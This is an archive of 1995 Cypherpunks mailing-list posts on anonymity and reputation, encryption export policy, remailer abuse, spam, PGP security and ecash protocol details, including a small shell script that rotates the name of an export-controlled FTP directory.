There is more involved in these cases than just loss of reputation capital. Physical capital is involved as well. So this is one way in which I think the analogy does not work. Another difference relates to the number of people involved. As I understand it, the motivation for the corporate veil of immunity from liability is so that people can safely band together in business. If there were no veil, and one harmful act by a member of the corporation could result in any stockholder being held liable, then few people would be willing to commit their assets to such an activity. The risk would be too great. The point is that this protection is oriented towards protecting large numbers of people. It does not make much sense for a single person to incorporate in order to try to protect himself from his own harmful acts, and in fact I understand that the veil can often be easily pierced in such situations. On the other hand, with anonymity we are generally dealing with single individuals. There is no apparent need for people to pool reputation capital in an endeavor, and have it be protected by the use of anonymity. The closest I can think of would be for a bunch of highly regarded individuals to announce that they were going to join together and create commentaries which would demonstrate all the insight, wit, and other traits which gave these people such a high reputation in the first place, but that the resulting missives would be released anonymously, so that if one of them ended up reflecting badly on the writers, there would be no way to know who had actually created it (it could be a fake created by an imitator). While I can't rule this out, it doesn't seem like a likely scenario, and it doesn't seem to offer the opportunities that corporations do for increasing productivity. Another issue is the different forms of anonymity, which don't have clear analogies with physical capital. 
Using a pseudonym you can build up reputation capital (or at least reputation) in the nym, but then you no longer have immunity from harm if it commits some gaffe. (Actually I suppose this is not too different from the corporation whose assets can be attacked but not those of the shareholders.) Then there are the limited pseudonyms discussed by David Chaum, where there are limits in how many pseudonyms of a particular type a person can create. You could have one "committed" pseudonym, unlinkable to your True Name, which you post under; but you'd only get that one. (You could post under other pseudonyms but they wouldn't be able to get that "committed" stamp.) You'd have to be pretty careful what you say via that nym, much as you are today with your True Name (which BTW a lot of people don't realize yet). Then people could filter so they only received messages from committed nyms, figuring that senders would be more likely to put meaningful content into these kinds of messages. Chaum's system of credentials also could allow you to transfer endorsements from one pseudonym to another. We have discussed the idea that such endorsements could be considered an embodiment of reputation capital. You could post a wide range of messages under different pseudonyms, collect the positive endorsements (and discard the negative ones), and attach them to your True Name or committed nym. This might encourage people to abandon their natural caution in making postings which will come back to haunt them years hence (again, this will be more an issue once people realize that this will happen). Hal From rwizard at mindspring.com Mon Nov 20 15:40:22 1995 From: rwizard at mindspring.com (rwizard at mindspring.com) Date: Tue, 21 Nov 1995 07:40:22 +0800 Subject: "Dear Newt" Letter... Message-ID: <199511202232.RAA28111@borg.mindspring.com> At 04:38 PM 11/20/95 -0500, Robert Hettinga wrote: > >My, *this* looks interesting... > > >Cheers, >Bob Hettinga ... >Dear Mr. 
Speaker: > > We are writing to express serious concerns about the >Administration's efforts to continue to restrict the ability >of computer users at home and abroad to protect their personal >and private information over electronic networks through the >use of encryption technology. The Administration seems ... As a constituent and campaign volunteer of Mr. Newt, I think I will drop a hard copy of this off at his office along with a healthy dose of *my* views ! Thanks for posting it. rwizard at mindspring.com ================================================= "The Internet is already full - Go Away !" ================================================= ----Begin Geek Code--- GAT d- s+:+ a+ C++++ UH++++L++++ P+ L++ E--- W+++ N+ K- w++++ O-- M-- V PS--- PE+++ Y++ PGP++ t+++ 5+++ X++ !R tv- b+ DI+++ D+ G-- e* h---- r+++ y++++ ---End Geek Code--- From hallam at w3.org Mon Nov 20 15:41:42 1995 From: hallam at w3.org (hallam at w3.org) Date: Tue, 21 Nov 1995 07:41:42 +0800 Subject: "Dear Newt" Letter... In-Reply-To: Message-ID: <9511202245.AA28548@zorch.w3.org> Hmm, not sure that it gets us anywhere. The Republicans seem to be even more keen on wiretap and anti-privacy legislation than the Democrats. Its called "being tough on crime".
After the airplane seat incident I don't see Newt in the running for President so it probably misses the mark. He might slip in a rider on a bill but if you look at who gets that sort of treatment it correlates very well with donations, silicon valley seems to be backing Clinton wallet wise. I would not expect Bob Dole to be resisting pressure from the NSA on this one more forcefully than Clinton (which let us be clear ain't very forcefully at all). I thought the quality of writing rather poor, the points are made in polemic, partisan terms which can be made in non-partisan terms. If I were Newt this letter would say to me "we will vote for you anyway", so why should Newt bother to pander? The ad hoc ginger groups listed are a bit odd, the authors are associated with much better known (if fruitcake) groups. Phill From corey at netscape.com Mon Nov 20 15:43:42 1995 From: corey at netscape.com (Corey Bridges) Date: Tue, 21 Nov 1995 07:43:42 +0800 Subject: Spam the Sign! Message-ID: <199511202259.OAA11521@netscape.com> Hm. Well, if you think spamming us will help convince the gov't to export strong crypto, go crazy. (Heck, I don't mind--it makes my job more secure.) And yes, we HAVE enjoyed the message "Strong Crypto NOW" that's been scrolling for the last 3 hours. Corey Bridges Security Scribe Netscape Communications Corporation 415-528-2978 From zerucha at shell.portal.com Mon Nov 20 15:44:18 1995 From: zerucha at shell.portal.com (Thomas E Zerucha) Date: Tue, 21 Nov 1995 07:44:18 +0800 Subject: Virus attacks on PGP In-Reply-To: <199511201945.LAA27486@netcom10.netcom.com> Message-ID: Thanks for the post. I think there are a few interesting points, and some of the things I do to try to make things more difficult for a potential virus. First, my secring is on a PCMCIA memory card, as are the versions of PGP, in this case DOS and Linux. A virus is unlikely to attack both, and when the memory card is in, the network and modem cards are out.
Second, I think PGP is statically linked by default. If it isn't, this should be changed - there was recently a CERT alert about telnet services being compromised by switching DLLs. The code can also be cross compiled and burned onto a CDROM which would make it difficult to infect. zerucha at shell.portal.com -or- 2015509 on MCI Mail finger zerucha at jobe.portal.com for PGP key From dittrich at cac.washington.edu Mon Nov 20 15:44:26 1995 From: dittrich at cac.washington.edu (Dave Dittrich) Date: Tue, 21 Nov 1995 07:44:26 +0800 Subject: (cpx) Re: "Junk E-Mail" Message-ID: <9511202303.AA23192@red3.cac.washington.edu> > At 06:47 PM 11/19/95 -0500, you wrote: > > > > Is anyone else getting lots of junk e-mail lately? I'm getting all > >kinds of direct marketing crap to both of my main accounts and I haven't > >posted to usenet in months. > > On a related note, Compuserve had a note on their system last week from > the sysop. Their customers are receiving unwanted e-mail advertisements > from the Internet. Compuserve sysops are attempting to block the spamming > but are finding it difficult because the advertiser is coming in via > different routes. They are also attempting to stop them using the court > system. > > The advertiser, according to the Compuserve sysop, threatened a > mail-bombing if Compuserve tried to block them!!! This would be a just > cause to call in the CSOF (Cypherpunk Soldier of Fortune) for a "measured > response". Yes, I've noticed these as well. One troubling thing I noted with one such spam-handed "attack" was the use of a group of internal email addresses (in the sense that we don't advertise these addresses) as addressees for a message that had an analog sent to www-buyinfo and some other web related addresses. This seems to indicate a way of organizing lists into sets based on location/topic, but doesn't include all other potential addressees in the same domain or organization.
I guess it was only a matter of time before someone wrote sophisticated spamming servers that somehow capture/analyze log files, or is this just some idiot front end that lets ad-happy fools spam with a smaller apparent footprint? By the way... One reply I got from an ISP re: one of these drive by spammings indicated that they were charging the idiot for disobeying policy. I've started suggesting to ISPs that they dis-user and charge the offender (in case they haven't thought of this yet). If non-spam policies were more widely used, and these idiots lose their email/access and a few hundred dollars in charges for wasting ISP admin time, perhaps this trend won't continue. -- Dave Dittrich Client Services, Computing & Communications dittrich at cac.washington.edu University of Washington Dave Dittrich / dittrich at cac.washington.edu From zerucha at shell.portal.com Mon Nov 20 15:50:38 1995 From: zerucha at shell.portal.com (Thomas E Zerucha) Date: Tue, 21 Nov 1995 07:50:38 +0800 Subject: Remailer list or FAQ? Message-ID: Is there a FAQ or other list of anonymous remailers? Or how to use the one at portal.com (I had this info somewhere, but it takes forever to do a zgrep `find...). zerucha at shell.portal.com -or- 2015509 on MCI Mail finger zerucha at jobe.portal.com for PGP key From perry at piermont.com Mon Nov 20 16:56:30 1995 From: perry at piermont.com (Perry E. Metzger) Date: Tue, 21 Nov 1995 08:56:30 +0800 Subject: "Dear Newt" Letter... In-Reply-To: <9511202245.AA28548@zorch.w3.org> Message-ID: <199511210028.TAA15346@jekyll.piermont.com> hallam at w3.org writes: > Hmm, not sure that it gets us anywhere. The Republicans seem to be even > more keen on wiretap and anti-privacy legislation than the Democrats. > Its called "being tough on crime". Er, Newt was the one who railed against the Exon censorship bill, and who's said in public that clipper is unrealistic.
Anyway, there is no observable difference between Republicans and Democrats on the issue of wiretapping -- most statements that Republicans are worse are based on wishful thinking by Democratic sympathizers. Perry From jya at pipeline.com Mon Nov 20 16:58:54 1995 From: jya at pipeline.com (John Young) Date: Tue, 21 Nov 1995 08:58:54 +0800 Subject: Pix Lox Message-ID: <199511210034.TAA15743@pipe6.nyc.pipeline.com> Bill Gates in "The Road Ahead": A complete failure of the information highway is worth worrying about. Because the system will be thoroughly decentralized, any single outage is unlikely to have a widespread effect. If an individual server fails, it will be replaced and restored. But the system could be susceptible to assault. As the system becomes more important, we will have to design in more redundancy. One area of vulnerability is the system's reliance on cryptography -- the mathematical locks that keep information safe. Excerpted in Newsweek, November 27, pp. 67-68. Rubberneck the roadwreck with Steven Levy in "Bill's New Vision." From dlv at bwalk.dm.com Mon Nov 20 17:27:16 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Tue, 21 Nov 1995 09:27:16 +0800 Subject: Java & Netscape security [NOISE] In-Reply-To: Message-ID: Joseph Malcolm writes: > Dimitri Vulis writes: > >m5 at dev.tivoli.com (Mike McNally) writes: > >> Frederick B. Cohen writes: > >> > This is baloney. When you work for Netscape or Sun and speak about you > >> > company's products, you are representing the company whether you > >> > disclaim it or not. > >> > >> Baloney. > > > >Fred is right. I used to work for Goldman Sachs & their internet usage polic > >stated that when you write to Internet or Usenet from a GS account, it will > >reflect on the firm no matter how you disclaim it. > > Dr. Cohen is I believe maintaining it doesn't matter where you write > from. Note that the Sun employee's message that sparked this was sent > from a Netcom account. If that's what Dr. 
Fred said, then I strongly disagree. (Sorry, I haven't been following what Dr. Fred said very closely. Can you blame me? :) Btw, Goldman has a very reasonable Internet use policy that encourages employees to get accounts on commercial internet providers. Btw^2, didn't Sun fire someone a couple of years ago for posting a homophobic joke to Usenet? --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From jsimmons at goblin.punk.net Mon Nov 20 17:49:27 1995 From: jsimmons at goblin.punk.net (Jeff Simmons) Date: Tue, 21 Nov 1995 09:49:27 +0800 Subject: Spam the Sign! In-Reply-To: <199511202259.OAA11521@netscape.com> Message-ID: <199511210121.RAA02291@goblin.punk.net> > > Hm. Well, if you think spamming us will help convince the gov't to export > strong crypto, go crazy. (Heck, I don't mind--it makes my job more secure.) > > And yes, we HAVE enjoyed the message "Strong Crypto NOW" that's been > scrolling for the last 3 hours. > > Corey Bridges > Security Scribe > Netscape Communications Corporation > 415-528-2978 I'm not sure what NWBR's point is, but the original thread he's quoting was about making the 'evaluation' copies available with 128bit RC4 to U.S. users. Jeff Weinstein said that he thought that this was a good idea, and would see about making it available via an export-controlled ftp server "once we get government approval". I was involved in that thread, since as a Linux user, I can't buy a supported copy, and therefore can't take advantage of the strong crypto features of the Navigator. So I would guess that he's spamming YOU to convince YOU to make strong crypto available. And as far as needing government approval, I noticed that Sameer has an export controlled ftp server at c2.org. Maybe he could tell us what is necessary to setup such an animal. 
-- Jeff Simmons jsimmons at goblin.punk.net From sameer at c2.org Mon Nov 20 18:03:09 1995 From: sameer at c2.org (sameer) Date: Tue, 21 Nov 1995 10:03:09 +0800 Subject: Spam the Sign! In-Reply-To: <199511210121.RAA02291@goblin.punk.net> Message-ID: <199511210130.RAA26710@infinity.c2.org> > > And as far as needing government approval, I noticed that Sameer has an > export controlled ftp server at c2.org. Maybe he could tell us what is > necessary to setup such an animal. > > -- I do what RSADSI does with ftp.rsa.com. It requires a cronjob and sed. I didn't get the NSA to approve it, but I figure if it's good enough for RSADSI it's good enough for me. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From hfinney at shell.portal.com Mon Nov 20 18:16:33 1995 From: hfinney at shell.portal.com (Hal) Date: Tue, 21 Nov 1995 10:16:33 +0800 Subject: remailer abuse Message-ID: <199511210154.RAA10532@jobe.shell.portal.com> From: Greg Broiles > I think adopting a submissive or apologetic stance with respect to the > operation of a remailer is a mistake. What we do is protected by the First > amendment, supports a 200+ year tradition of anonymous political speech in > America, provides a valuable service to a worldwide community, and can help > avoid the very abuse they are accused of facilitating. The problem is that the time when someone complains about the remailer is exactly when they have received some obnoxious message. This is often their first exposure to the idea of anonymous remailers. Such people are the last ones who are going to be receptive or interested in hearing a lecture about how remailers are protecting the First Amendment. I generally do my best to avoid getting into a debate with these people. I tell them I have added them to the block list, and usually that is the end of it. 
So while I think Greg's approach is fine as part of an intellectual debate over the pros and cons of anonymity, it does not address the most frequent complaints I see as a remailer operator. I hope that over time more people will become exposed to the idea of remailers and anonymity other than in the form of some annoying anonymous message. Then I think they will be better able to deal with it when they do get some problem mail. > The child who was the > target of the "Mr. Pedophile" message(s) should have been taught how to use > remailers and how to maintain his privacy on the net so that, if he really > is the victim of some sort of random child stalker, it won't happen again. That message was not posted to Cypherpunks. It asked in some graphic detail whether this boy engaged in sexual relations with his parents. However, the mother was surprisingly calm about it, and simply asked to be blocked. The fact that she knew about blocking gave me the impression she was remailer-savvy, and as I wrote above this seems to make a big difference. Hal From jya at pipeline.com Mon Nov 20 18:35:53 1995 From: jya at pipeline.com (John Young) Date: Tue, 21 Nov 1995 10:35:53 +0800 Subject: HOR_mel Message-ID: <199511201509.KAA03155@pipe4.nyc.pipeline.com> 11-20-95. Washrag: "It's the Spam You Read That's Making Many Interneters Queasy." It's squarely at odds with Internet culture. And an on- line mass mailer is drafting a lawsuit against a spammer, advised by Stewart A. Baker, former general counsel to the NSA. Having taken plenty of flak on the Internet for defending a Clinton administration proposal on encryption, Baker is pleased to be working on an issue so dear to the heart of the 'Net community. "It's not every day that you come to the office humming a tune," Baker said. "But working on this case, I do." 11-20-95. W$Joker: "Why Many Businesses Can't Keep Their Secrets." Personal computers are the biggest contributors to the security headaches of companies. 
"Computer technology has enhanced the control and power of the individual employee to a level that transcends what was customary in the traditional workplace." Many experts see a correlation between recent leaks and the decline in workers' loyalty to employers, falling job security and increased workloads. The media have played a part as well by becoming more aggressive over the past three decades about challenging institutions and exposing scandal. This makes it "more possible for an employee to have his 15 minutes of fame" by waving his boss's victorias. Just what suffices legally as a reasonable precaution in a frontier developing as rapidly as computer technology isn't clear yet. For instance, requiring passwords for access to a computer system, once considered a reasonable precaution, now isn't enough. That's why consultants are recommending periodic internal audits to test for computer-system penetration and compliance with documented security policies. 2: HOR_mel (14 kb) From attila at primenet.com Mon Nov 20 19:13:26 1995 From: attila at primenet.com (attila) Date: Tue, 21 Nov 1995 11:13:26 +0800 Subject: Detweiler and his theory of "Budding Nazism" In-Reply-To: <199511202005.MAA25006@infinity.c2.org> Message-ID: It probably is not worth the aggravation, but ignorant, both politically and as to the charter of cypherpunks, assholes like Detweiler need to be set straight. Since I doubt Detweiler is open to discussion --small minds rarely are, we might _very_ politely suggest to the editors of Time, NYT, and a couple others that Detweiler is not only misinformed, but that he is not open to discussion. Enough _polite_ letters to the editors can do wonders. ________________________________________________________________________ On Mon, 20 Nov 1995, Hroller Anonymous Remailer wrote: > The other anonymous poster was referring to Detweiler's > belief that cryptoanarchy was a budding Nazism as one > of his apparent motivations.
After a little bit of > amateur Detweiler study I can agree with this. > > His page at http://www.csn.net/~ldetweil/ has sections that > emphasize his concern about cryptoanarchy as a kind of > "neo-nazism". Thankfully the cryptoanarchist sentiments > on this list are much different than nazism in the way > it advocates complete disengagement from the political > process, something that tended to make the Nazist agenda > highly dangerous. Without that you just have a bunch of > subversive guerillas. Like gnats, irritating but irrelevant. > > So as long as we stick with the non-political advocation, > and stay disorganized, and don't ever amount to anything > significant as far as visible political clout, I think > Detweiler is generally going to continue to leave us alone, > thank God. > > From carolann at censored.org Mon Nov 20 19:28:25 1995 From: carolann at censored.org (Censored Girls Anonymous) Date: Tue, 21 Nov 1995 11:28:25 +0800 Subject: Happy Thanksgiving L. Detweiller! Message-ID: <199511210254.TAA12709@mailhost1.primenet.com> And to all of your tentacles, And to all of you on The Cypherpunk List. Love Always, Carol Anne ps Is that L for Laura or Lori? 
-- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From hfinney at shell.portal.com Mon Nov 20 20:55:56 1995 From: hfinney at shell.portal.com (Hal) Date: Tue, 21 Nov 1995 12:55:56 +0800 Subject: Cyberpunk handbook Message-ID: <199511210436.UAA26114@jobe.shell.portal.com> You Bay Area people probably know all about this already, but I was browsing through the local bookstore yesterday and saw Eric Hughes, Cypherpunks co-founder, on the cover of the "Cyberpunk [sic] Handbook", a slim satirical volume by the Mondo 2000 people. The book has more attitude than information, though. Hal From rsalz at osf.org Mon Nov 20 21:03:11 1995 From: rsalz at osf.org (Rich Salz) Date: Tue, 21 Nov 1995 13:03:11 +0800 Subject: Export control FTP servers Message-ID: <9511210441.AA26515@sulphur.osf.org> > I do what RSADSI does with ftp.rsa.com. It requires a cronjob >and sed. I didn't get the NSA to approve it, but I figure if it's good >enough for RSADSI it's good enough for me. I believe some of the following has been posted here before. The person to speak with is John Sonderman Office of Defense Trade Department of Compliance 703 875 6644 He's supposed to be Internet-aware. What's not common knowledge is that he's leaving by early December for budgetary reasons. If you're thinking of putting export controlled stuff up for FTP, you should probably contact John now. 
/r$ From iang at cory.EECS.Berkeley.EDU Tue Nov 21 13:47:02 1995 From: iang at cory.EECS.Berkeley.EDU (Ian Goldberg) Date: Tue, 21 Nov 95 13:47:02 PST Subject: ecash protocol: Part 1 Message-ID: <199511212146.NAA11456@cory.EECS.Berkeley.EDU> Well, I dropped off the net for a few days due to a midterm, but I'm back now... Last week, I was taking a look at the ecash protocol (no, I don't have a copy; I have a binary, which I can't even run...). I've managed to decipher a useful bit of the first message sent from the shop to the payer. It's the Payment Request, and contains the following information: o Header identifying packet as Payment Request o The integer 4 o The payment amount, in cents o The time (seconds since 1970) o The integer 79 o The name of the shop (payee) o A description of the item being paid for o An empty string o The integer 0 o End of Record marker I don't know what the 4, 79, empty string, and 0 are for. I assume one of them (probably the 4) is some indication of currency (US cents). I can provide a byte-level description of the record, if people want. I guess the important bit is that the payee, the item being bought, and the cost are sent _in the clear_. Some of the people I've talked to think this is a huge privacy breach, and some don't. You all can debate this now. Lucky can, if he wishes, add insight, and/or tell us what DC may do about this. I'll try to figure out the rest of the fields, and some of the other messages (like the payment itself). - Ian "Why exactly isn't DigiCash releasing the protocol? What about the source?" From frissell at panix.com Tue Nov 21 13:51:04 1995 From: frissell at panix.com (Duncan Frissell) Date: Tue, 21 Nov 95 13:51:04 PST Subject: Are there enough FBI agents to handle Digital Telephony????? 
Message-ID: <199511212150.QAA02220@panix.com> At 11:05 AM 11/21/95 -0500, Peter Wayner wrote: >Has anyone ever done the math on the FBI's new wire tapping >proposals and determined whether they'll have enough agents to >do all of the listening? Doesn't a court ordered wire tap >require that people listen in and screen the recordings. Does No. Automatic equipment (pen registers) is almost as old as wiretaps. >12,500 agents would cost $1.2 bill on a year if they each cost >about $100,000 in salary and benefits. But we need to account >for vacations, shift work and testifying the trials of the drug >lords who are sent to jail. Let's assume that you only need >1/10th the people to handle the two evening shifts. That gives >you a cost of $1.4 billion before vacations. Adding 40% to cover >vacation and weekends puts you close to $2 billion. Let's round >up. The bodies are still needed for management, analysis, arrest, prosecution, and punishment. Until Robocop is deployed, the criminal justice system will be a labor intensive effort. This is still good news for us though. Anyone who's been in business (say George McGovern after his Connecticut inn bankruptcy) can tell you that people are the most expensive part of a business. You pay all that cash each year and at the end of the year you have nothing concrete to show for it. You are just buying time. Labor costs become more of a problem as the quantity and value of capital goods increases since the more slowly increasing factor (labor) is bid up. Thus people cost a lot more these days than they did in 1800 because capital goods (per unit) are much cheaper than they used to be. (Ignore temporary changes in returns to labor as women, 3rd world residents, or freed commie slaves join the labor force. They are quickly absorbed. Wants are unlimited.) Now the increasing cost of labor is not a problem if those workers are producing goods of value. They are "making" their own earnings. 
If they are in a parasitic profession, however, -- one that subsists on what it steals from others -- the rising cost of labor means that that institution has to steal more and more to keep up. Eventually, the speed of economic change can swamp the theft ability of such an organization. Such swamping occurs because market entities support their own growth or they don't grow. Since they lift themselves up, growth is unlimited. Parasitic entities on the other hand are limited by the strength and susceptibility of their host. Hosts may weaken if the parasite grows too much or it may find a way to cast off the parasite. No one rejects a market economic actor that is a potential customer or employer but parasites are rejected whenever possible. Market Earth on the nets gives us many opportunities to both fuel fast growth and shake off parasites. It is perfectly possible for markets to outbid the secret police for the labor of its agents given the compound growth rates that are a feature of friction-free capitalism. DCF "Don't call it Anarchy. Call it Disintermediation." From anonymous-remailer at shell.portal.com Mon Nov 20 23:58:31 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Tue, 21 Nov 1995 15:58:31 +0800 Subject: Java & Netscape security [NOISE] Message-ID: <199511210731.XAA08374@jobe.shell.portal.com> On Fri, 17 Nov 1995, Dr. Dimitri Vulis wrote: > m5 at dev.tivoli.com (Mike McNally) writes: > > Frederick B. Cohen writes: > > > This is baloney. When you work for Netscape or Sun and speak about > > > your company's products, you are representing the company whether you > > > disclaim it or not. > > > > Baloney. > > Fred is right. I used to work for Goldman Sachs & their internet usage > policy stated that when you write to Internet or Usenet from a GS account, > it will reflect on the firm no matter how you disclaim it. I think this is true, and is where we start to get into reputations and trust. 
If someone from Goldman Sachs posts to a Usenet group discussing abortion or gun-control, and says that: "These opinions are my own and not my employers." Then, we can accept that, no matter how silly their opinions are. But there is a difference in the way we look at it if someone from Goldman Sachs posts to misc.invest.stocks instead and says that the Goldman Sachs Strip Coupon Fund is better than the one from Merrill Lynch -- that it's safer and produces higher returns because Goldman uses cubic spline interpolation methodologies to interpolate the yield curve, while Merrill Lynch doesn't. There is a difference here. In the first case, the poster is not commenting about anything to do with their work, -- it really is just one man's opinion -- while in the second they are actually commenting upon something their employer is selling. If the employee tries to add, "these opinions are my own, and do not reflect the opinion of my employer" then we have a huge credibility problem. You really can't have it both ways. You can't post officially and unofficially at the same time, unless it really does have nothing to do with your work. If you post from Sun Engineering, and you are posting to a group that focuses on Sun, and you are talking about a Sun product, then people are going to take your comments as an official statement from Sun. You are that product's spokesperson, whether you disclaim or not, and should act accordingly. No matter what, that's the way people are going to see it. It's a huge responsibility ... it's not like speaking candidly at an open Member's table at the Rideau Club or anything, like that. Sun and Netscape and AT&T should know this. Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. 
From frantz at netcom.com Tue Nov 21 00:00:58 1995 From: frantz at netcom.com (Bill Frantz) Date: Tue, 21 Nov 1995 16:00:58 +0800 Subject: Virus attacks on PGP Message-ID: <199511210732.XAA04912@netcom18.netcom.com> At 14:52 11/20/95 -0800, Thomas E Zerucha wrote: >... The code can also be cross compiled >and burned onto a CDROM which would make it difficult to infect. Certainly having PGP run from a CDROM or other read-only device would be a big help. Even better would be to have all the privileged code also run from a read-only device. Bill Frantz From attila at primenet.com Tue Nov 21 01:24:19 1995 From: attila at primenet.com (attila) Date: Tue, 21 Nov 1995 17:24:19 +0800 Subject: Export control FTP servers In-Reply-To: <9511210441.AA26515@sulphur.osf.org> Message-ID: well, since it is "official" policy and the basics concern rejecting all foreign addresses and making the proposed recipient agree to a file statement agreeing not to export and that he/she/it is an American or Canadian citizen, it might be nice if someone who has the `sed ....` and/or `awk...` scripts would post them for all to use (with whatever disclaimers, etc.) On Mon, 20 Nov 1995, Rich Salz wrote: > > I do what RSADSI does with ftp.rsa.com. It requires a cronjob > >and sed. I didn't get the NSA to approve it, but I figure if it's good > >enough for RSADSI it's good enough for me. > > I believe some of the following has been posted here before. > The person to speak with is > John Sonderman > Office of Defense Trade > Department of Compliance > 703 875 6644 > He's supposed to be Internet-aware. What's not common knowledge is > that he's leaving by early December for budgetary reasons. If you're > thinking of putting export controlled stuff up for FTP, you should > probably contact John now. 
> /r$
>

From sameer at c2.org Tue Nov 21 01:28:37 1995
From: sameer at c2.org (sameer)
Date: Tue, 21 Nov 1995 17:28:37 +0800
Subject: Export control FTP servers
In-Reply-To:
Message-ID: <199511210906.BAA04152@infinity.c2.org>

#!/bin/sh
# Rotate the random name of the export-controlled directory.
umask 022
# Suffix chosen by the previous run.
DIRNAME=`cat $HOME/.usonlydir`
# New suffix: MD5 of pseudo-random data.
NEWDIRNAME=`/usr/local/bin/pseudo-random | /usr/local/bin/md5sum`
# Rename the directory; stop if the FTP area is missing.
cd /u1/ftp/pub/US-only || exit 1
mv I_will_not_export_$DIRNAME I_will_not_export_$NEWDIRNAME
cd ..
# Point the README at the new directory name.
sed -e "s/$DIRNAME/$NEWDIRNAME/" < README.US-only > README.new
mv README.new README.US-only
# Remember the new suffix for the next run.
echo $NEWDIRNAME > $HOME/.usonlydir

--
sameer                                          Voice:   510-601-9777
Community ConneXion                             FAX:     510-601-9734
The Internet Privacy Provider                   Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")        sameer at c2.org

From rsalz at osf.org Tue Nov 21 03:34:37 1995
From: rsalz at osf.org (Rich Salz)
Date: Tue, 21 Nov 1995 19:34:37 +0800
Subject: "Junk E-Mail"
Message-ID: <9511211114.AA26914@sulphur.osf.org>

>RICO is very serious stuff. Criminal prosecution under the terms of the

Like Operation Rescue? Wrong again, Alice.

From anonymous-remailer at shell.portal.com Tue Nov 21 03:48:10 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Tue, 21 Nov 1995 19:48:10 +0800
Subject: "Junk E-Mail"
Message-ID: <199511210955.BAA16150@jobe.shell.portal.com>

On Mon, 20 Nov 1995 hallam at w3.org wrote:

> I think it would be better to slap a RICO suit onto the company
> concerned. It sounds to me like an attempt to gain financial advantage
> through threatening behaviour. Where I come from that means jail time.

RICO is very serious stuff. Criminal prosecution under the terms of the Racketeer-Influenced & Corrupt Organizations Act is reserved for very serious situations indeed. It's true "rubber hose" stuff. It was intended as a tool for use against mobsters, but US attorneys have used it against white-collar criminals.
I think, you'd have to have strong evidence of an ongoing "criminal enterprise", which I don't think you have with junk e-mail. I doubt that there are many experts in RICO as it applies to computer law. I really don't know if the laws pertaining to breaches of computer security would be applicable, or not, or how RICO really does work or fit. Although the armchair solicitor in me might speculate that you'd have to show some form of organized collusion or somesuch to breach computer or network integrity to prosecute under RICO. And you'd have to show -- I'm uncertain if the standard is beyond a reasonable doubt or not -- that it was at some point willful and well-organized. I suppose that is a moot point though, when we're talking about pre-trial forfeiture of all assets -- right down to the food in the refrigerator. I doubt at that point that a trial would be forthcoming. It really does reinforce the maxim, that it's best not to fight a battle that you cannot win. RICO is very persuasive that way. I'm certain that there will be those who would say that it's not administratively possible to apply RICO to this situation. Most legal advisers would probably say that it can't be done, but I suppose then, that would be the time for the clarion call, "Then get me a lawyer who says it CAN be done." Personally, however, I'm unconvinced, and would defer to those much more knowledgeable in such matters. Although, in all honesty, RICO and computer networks in the same sentence literally scares the be-jeebers outta me. Alice de 'nonymous ... ...just another one of those... ...hunters... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From enzo at ima.com Tue Nov 21 03:55:14 1995 From: enzo at ima.com (Enzo Michelangeli) Date: Tue, 21 Nov 1995 19:55:14 +0800 Subject: cryptl99.zip Free encryption library for DOS/UNIX/Windows (fwd) Message-ID: Found on sci.crypt, apparently not yet posted on this list. I haven't examined it at all, caveat emptor.
The size of the ZIP file is about 148 Kb. Enzo ---------- Forwarded message ---------- Path: news.hklink.net!hpg30a.csc.cuhk.hk!cuhknntp!news.uoregon.edu!cs.uoregon.edu!reuter.cse.ogi.edu!hp-cv!hp-pcd!sdd.hp.com!swrinde!newsfeed.internetmci.com!in1.uu.net!brighton.openmarket.com!decwrl!waikato!auckland.ac.nz!news From: pgut01 at cs.auckland.ac.nz (Peter Gutmann) Newsgroups: alt.security,comp.security.misc,sci.crypt Subject: cryptl99.zip Free encryption library for DOS/UNIX/Windows Date: 20 Nov 1995 09:57:45 GMT Organization: University of Auckland Lines: 45 Sender: pgut01 at cs.auckland.ac.nz (Peter Gutmann) Message-ID: <48pjep$7ge at net.auckland.ac.nz> NNTP-Posting-Host: cs26.cs.auckland.ac.nz X-Newsreader: NN version 6.5.0 #3 (NOV) Xref: news.hklink.net alt.security:6498 comp.security.misc:5814 sci.crypt:6827 [This was announced a few days ago, I've reposted it to a few crypto and security groups for people who don't read the archives groups] File name: ftp://garbo.uwasa.fi/pc/security/cryptl99.zip One line description: Free encryption library for Unix/DOS/Windows This encryption library provides a universal interface to a number of conventional-key encryption algorithms. The library currently supports encryption algorithms and modes of MDC/SHS CFB, DES ECB, CBC, CFB, OFB, PCBC, triple DES ECB, CBC, CFB, OFB, IDEA ECB, CBC, CFB, OFB, RC4, SAFER ECB, CBC, CFB, OFB, and SAFER-SK ECB, CBC, CFB, OFB. All encryption routines are accessed through a single standardised interface with parameters such as algorithm, mode and key size being selectable by the user. The library is supplied as source code for Unix, DOS, and the Amiga, and as dynamic link libraries for Windows and Windows NT. The design goal for the library was to create an easy-to-use, standardised interface to a number of popular encryption algorithms. Like the standard C file I/O libraries which work with FILE objects, this library works with an "encryption context" of type CRYPT_INFO. 
